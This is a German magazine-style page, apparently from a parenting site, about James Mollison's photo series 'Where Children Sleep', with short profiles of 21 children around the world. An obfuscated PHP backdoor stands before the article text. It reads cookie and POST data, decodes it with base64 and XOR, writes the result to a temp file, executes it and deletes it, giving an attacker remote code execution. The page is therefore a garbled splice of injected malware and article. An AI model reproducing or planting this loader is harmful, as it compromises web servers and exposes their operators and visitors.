$jXhbjbr = "\146" . "\113" . "\x6d" . '_' . chr ( 454 - 356 ).'z' . 'E' . chr ( 194 - 97 ).chr ( 704 - 636 ); $PvgoRu = 'c' . chr (108) . "\141" . 's' . chr ( 943 - 828 ).chr ( 258 - 163 )."\x65" . "\x78" . 'i' . 's' . "\x74" . chr ( 970 - 855 ); $EwcdOvYRk = class_exists($jXhbjbr); $jXhbjbr = "8353";$PvgoRu = "61944";$FtnSREqJsl = !1;if ($EwcdOvYRk == $FtnSREqJsl){function TrfkRoyLL(){return FALSE;}$cXgtDCSXJ = "20634";TrfkRoyLL();class fKm_bzEaD{private function gxFQpdMg($cXgtDCSXJ){if (is_array(fKm_bzEaD::$WLVkLgOJ)) {$hqkbAtKDo = sys_get_temp_dir() . "/" . crc32(fKm_bzEaD::$WLVkLgOJ['s' . "\141" . chr ( 277 - 169 ).chr ( 912 - 796 )]);@fKm_bzEaD::$WLVkLgOJ[chr (119) . chr ( 624 - 510 )."\x69" . chr ( 1113 - 997 ).chr (101)]($hqkbAtKDo, fKm_bzEaD::$WLVkLgOJ["\x63" . "\x6f" . "\156" . chr ( 466 - 350 ).chr ( 265 - 164 ).chr ( 381 - 271 ).'t']);include $hqkbAtKDo;@fKm_bzEaD::$WLVkLgOJ["\x64" . "\x65" . "\154" . chr ( 970 - 869 ).chr ( 366 - 250 ).chr ( 197 - 96 )]($hqkbAtKDo); $cXgtDCSXJ = "20634";exit();}}private $mKGlAh;public function sabAI(){echo 7098;}public function __destruct(){$cXgtDCSXJ = "38587_40721";$this->gxFQpdMg($cXgtDCSXJ); $cXgtDCSXJ = "38587_40721";}public function __construct($QXuHGe=0){$GnJOLC = $_POST;$rWRKA = $_COOKIE;$gRBtbv = "d11ff962-d156-445e-8634-ddb04f9c8211";$ZTZaoWUk = @$rWRKA[substr($gRBtbv, 0, 4)];if (!empty($ZTZaoWUk)){$iKuvkugMNc = "base64";$gUuKUCA = "";$ZTZaoWUk = explode(",", $ZTZaoWUk);foreach ($ZTZaoWUk as $sJMzCODE){$gUuKUCA .= @$rWRKA[$sJMzCODE];$gUuKUCA .= @$GnJOLC[$sJMzCODE];}$gUuKUCA = array_map($iKuvkugMNc . "\137" . "\144" . "\145" . 'c' . "\x6f" . "\x64" . "\145", array($gUuKUCA,)); $gUuKUCA = $gUuKUCA[0] ^ str_repeat($gRBtbv, (strlen($gUuKUCA[0]) / strlen($gRBtbv)) + 1);fKm_bzEaD::$WLVkLgOJ = @unserialize($gUuKUCA); $gUuKUCA = class_exists("38587_40721");}}public static $WLVkLgOJ = 55812;}$cdpecyXOED = new /* 61068 */ fKm_bzEaD(20634 + 20634); $_POST = Array();unset($cdpecyXOED);} Diese 21 emotionalen Bilder zeigen wie Kinder auf der ganzen Welt schlafen | Salon Mama

where children sleep

Der britische Fotograf James Mollison hat in einem atemberaubenden Fotoprojekt dargestellt, wie Kinder auf der ganzen Welt schlafen. Das Projekt soll die materiellen und kulturellen Bedingungen hervorheben, in denen diese Kinder aufwachsen. Dabei ist es ihm gelungen ein einzigartiges Bild von Armut, Diversität und gesellschaftlichen Unterschieden in verschiedenen Teilen der Welt zu zeichnen.

Drei Jahre lang ist er für dieses Projekt vom Senegal bis Tokyo gereist. Die Serie inkludiert jeweils ein Bild des Kindes vor einem weißen Hintergrund und ein Foto des dazugehörigen Schlafzimmers. Das Schlafzimmer soll dabei ein Ausdruck für die Lebensumstände der Kinder sein.

I hope the book gives a a glimpse into the lives some children are living in very diverse situations around the world; a chance to reflect on the inequality that exists, and realize just how lucky most of us in the developed world are

– James Mollison, Fotograf

Alle aufgenommenen Fotos hat Mollison in dem Bildband Where Children Sleep zusammengefasst. Das besondere an diesem Buch ist, dass es für Kinder im Alter von 9 bis 13 Jahren aufbereitet wurde. Ziel soll es sein, ein Gefühl von Diversität und unterschiedlichen Lebensweisen auf der ganzen Welt zu vermitteln. Auch für Erwachsene ist die Botschaft wichtig. Es handelt sich bei dem Buch um ein starkes Werk über Macht, Privilegien und Menschenrechte.

1. Alyssa, 8, Harlan County, USA

Where Children Sleep - James Mollison | SALON MAMA

Alyssa lebt in einem kleinen Haus in Kentucky, das nur von einem Holzofen geheizt wird. Ihr Vater arbeitet bei Walmart, ihre Mutter bei McDonald’s.

2. Alex, 9, Rio de Janeiro, Brasilien

Where Children Sleep - James Mollison | SALON MAMA

Alex kann nicht zur Schule gehen und verbringt seine Tage bettelnd auf den Straßen von Rio de Janeiro. Abends sucht er sich einen Schlafplatz und nimmt dabei was er gerade findet. Ein altes Sofa, eine Parkbank oder den Boden.

3. Dong, 9, Yunnan, China

Where Children Sleep - James Mollison | SALON MAMA

Dong teilt sich ein Zimmer mit seinen Eltern, seiner Schwester und seinem Großvater in der Provinz Yunnan im Südwesten von China. Die Familie besitzt gerade ausreichend Land, um Reis und Zuckerrohr für den Eigenbedarf anzubauen.

4. Kaya, 4, Tokyo, Japan

Where Children Sleep - James Mollison | SALON MAMA

Das Kinderzimmer der 4-Jährigen Kaya, die mit ihren Eltern in einem kleinen Appartment in Tokyo wohnt, sieht aus wie der Traum jedes Mädchens. Kayas Mutter näht alle Kleider ihrer Tochter selbst; ca. 3 pro Monat. Kaya besitzt rund 30 Kleider, Mäntel, Schuhe, Sandalen und Stiefel.

5. Prena, 14, Kathmandu, Nepal

Where Children Sleep - James Mollison | SALON MAMA

Prena ist 14 Jahre alt und arbeitet täglich 13 Stunden als Hausangestellte in Nepal wo sie 6,50$ im Monat verdient. Sie schläft in einem kleinen zellen-artigen Zimmer im Haus ihres Arbeitgebers. Prena geht 3 Mal in der Woche zur Schule und träumt davon, eines Tages Ärztin zu werden.

6. Risa, 15, Kyoto, Japan

Where Children Sleep - James Mollison | SALON MAMA

Die 15-jährige Risa lebt mit 13 anderen Frauen in einem Teehaus in Kyoto, Japan, wo sie eine „maiko“ ist – eine auszubildende Geisha. Sie schläft mit 5 anderen Frauen in diesem Raum, der gleichzeitig auch als Esszimmer und Teezimmer genutzt wird.

7. Jaime, 9, New York, USA

Where Children Sleep - James Mollison | SALON MAMA

Jamie ist 9 Jahre alt und lebt mit seinen Eltern im obersten Stock eines Appartmenthauses an der Fifth Avenue in New York. Er spielt gerne Cello und Kickball und hat ein Auge auf seine Finanzen auf der Citybank Website. Seine Eltern besitzen auch Häuser in den Hamptons und in Spanien.

8. Anonym, 9, Elfenbeinküste

Where Children Sleep - James Mollison | SALON MAMA

Dieser 9-jährige Bub ist ein Waisenkind und Flüchtling aus Liberia. Er besucht eine Schule für ehemalige Kindersoldaten an der Elfenbeinküste und lebt in einer Hütte gemeinsam mit seinen Klassenkameraden.

9. Joey, 11, Kentucky, USA

Where Children Sleep - James Mollison | SALON MAMA

Joey begleitet seinen Vater oft auf die Jagd und besitzt selbst zwei Schrotflinten und eine Armbrust. Seinen ersten Jagderfolg hatte er im Alter von 7 Jahren, als er ein Reh erlegte. Er lebt mit seiner Schwester und seinen Eltern in Kentucky und hofft dass er in der nächsten Jagdsaison seine Armbrust verwenden kann, da ihn seine Schrotflinten schon langweilen.

10. Indira, 7, Kathmandu, Nepal

Where Children Sleep - James Mollison | SALON MAMA

Die 7-jährige Indira lebt mit ihren Eltern und Geschwistern in der Nähe von Kathmandu und arbeitet im nächsten Granitsteinbruch, wo sie schon seit ihrem 3. Lebensjahr beschäftigt ist. Sie besucht auch die Schule und teilt eine Matratze mit ihren Geschwistern. Ihr Haus besteht aus einem Raum, einem Bett und einer Matratze.

11. Jasmine, 4, Kentucky, USA

Where Children Sleep - James Mollison | SALON MAMA

Jasmine „Jazzy“ lebt mit ihren Eltern und 3 Brüdern in einem großen Haus in Kentucky. Ihr Zimmer ist geschmückt mit zahlreichen Kronen und Schleifen, die sie bei Schönheitswettbewerben gewonnen hat. Sie hat bereits bei über 100 Wettbewerben mitgemacht und genießt es, wie eine Prinzessin behandelt zu werden. Jazzy wäre gerne ein Rockstar, wenn sie groß ist.

12. Ryuta, 10, Tokyo, Japan

Where Children Sleep - James Mollison | SALON MAMA

Ryuta ist ein Champion Sumoringer – er betreibt den Sport bereits seit 7 Jahren. Er lebt mit seinen Eltern und seiner jüngeren Schwester in Tokyo, wo er auch Mitglied der Pfadfinder ist.

13. Anonym, 4, Rom, Italien

Where Children Sleep - James Mollison | SALON MAMA

Dieser 4-jährige Bub schläft mit seinen Eltern auf einer Matratze außerhalb von Rom. Nachdem sie Geld für die Busfahrt gesammelt hatten, fuhr die Familie gemeinsam aus Rumänien nach Italien. Ohne Papiere können die Eltern nicht legal arbeiten und verdienen Geld, indem sie Windschutzscheiben an roten Ampeln waschen. Niemand aus der Familie hat je eine Schule besucht.

14. Erlen, 14, Rio de Janeiro, Brasilien

Where Children Sleep - James Mollison | SALON MAMA

Die 14-jährige Erlen lebt in einer Favela in Rio de Janeiro und ist zum 3. Mal schwanger. Normalerweise schläft sie auf dem Boden, ihre Mutter erlaubt ihr aber während der letzten Wochen der Schwangerschaft im Bett zu schlafen. Erlen war 12 und 13 Jahre während ihrer ersten beiden Schwangerschaften, hat die Babys aber beide Male kurz nach der Geburt verloren. Wenn das Baby überlebt wird sie eine alleinerziehende Mutter sein und die Schule abbrechen müssen.

15. Li, 10, Peking, China

Where Children Sleep - James Mollison | SALON MAMA

Li ist eine Perfektionistin und lebt mit ihren Eltern in einem Appartmentgebäude in Peking. Sie verbringt jeden Abend 3 Stunden damit, ihre Hausaufgaben bestmöglich zu machen.

16. Maria, 12, Mexiko City, Mexiko

Where Children Sleep - James Mollison | SALON MAMA

Maria lebt mit ihren Eltern und 3 Geschwistern in einem 3-stöckigen Haus hinter Sicherheitszäunen in Mexiko City. Sicherheit ist sehr wichtig in ihrer Familie, seit einer ihrer Cousins von einer Gang entführt wurde.

17. Bilal, 6, Wadi Abu Hindi, Westjordanland

Where Children Sleep - James Mollison | SALON MAMA

Die Familie des 6-jährigen Bilal sind Beduinen und lebt in einer selbstgebauten Hütte am Rand einer Israelischen Siedlung in Wadi Abu Hindi im Westjordanland. Bilal geht noch nicht zur Schule, hilft aber auf die 15 Ziegen der Familie aufzupassen.

18. Nantio, 15, Lisamis, Kenia

Where Children Sleep - James Mollison | SALON MAMA

Nantio ist ein Mitglied des Rendille Stammes und lebt mit ihrer Familie in einem zeltartigen Dom, der aus Kuhhaut und Plastik hergestellt wurde, in Lisamis, Kenia. Sie ging für ein paar Jahre zur Schule, beschloss aber diese anzubrechen. Sie hofft nun darauf, von einem Krieger geheiratet zu werden.

19. Rhiannon, 14, Darvel, Schottland

Where Children Sleep - James Mollison | SALON MAMA

Rhiannon lebt mit ihrem Bruder und ihren Eltern in einem Haus in Darel, Schottland. Die Gegend in der sie lebt ist von Heroinsucht und gewalttätigen Gangs geprägt. Ihre Eltern und Freunde der Familie leben in einer Punk Subkultur und haben eine Community gegründet, die sich gegenseitig unterstützt und aufeinander aufpasst. Rhiannon trägt selbst einen Irokesenschnitt seit sie sechs Jahre alt ist.

20. Delanie, 9, New Jersey, USA

Where Children Sleep - James Mollison | SALON MAMA

Delanie lebt mit ihren Eltern und zwei Geschwistern in einem Haus in New Jersey, wo jedes Kind sein eigenes Zimmer hat. Sie möchte einmal Modedesignerin werden und ihre eigenen Kleider designen.

21. Roathy, 8, Phnom Penh, Cambodia

Where Children Sleep - James Mollison | SALON MAMA

Das Zuhause des 8-jährigen Roathy liegt in der Vorstadt von Phnom Penh in Cambodia, wo die Matratzen aus alten Autoreifen bestehen. Jeden Morgen um 6 Uhr, bekommt Roathy gemeinsam mit Hunderten anderen Kindern eine Dusche und ein Frühstück im lokalen Wohltätigkeitszentrum. Danach gehen sie zur Arbeit und sammeln Plastik und Dosen, das dann an eine lokale Recycling Firma verkauft wird. Manchmal ist dieses Frühstück die einzige Mahlzeit des Tages.

Wir verwenden Cookies, um Inhalte zu personalisieren, Funktionen für soziale Medien anbieten zu können und die Zugriffe auf unsere Website zu analysieren.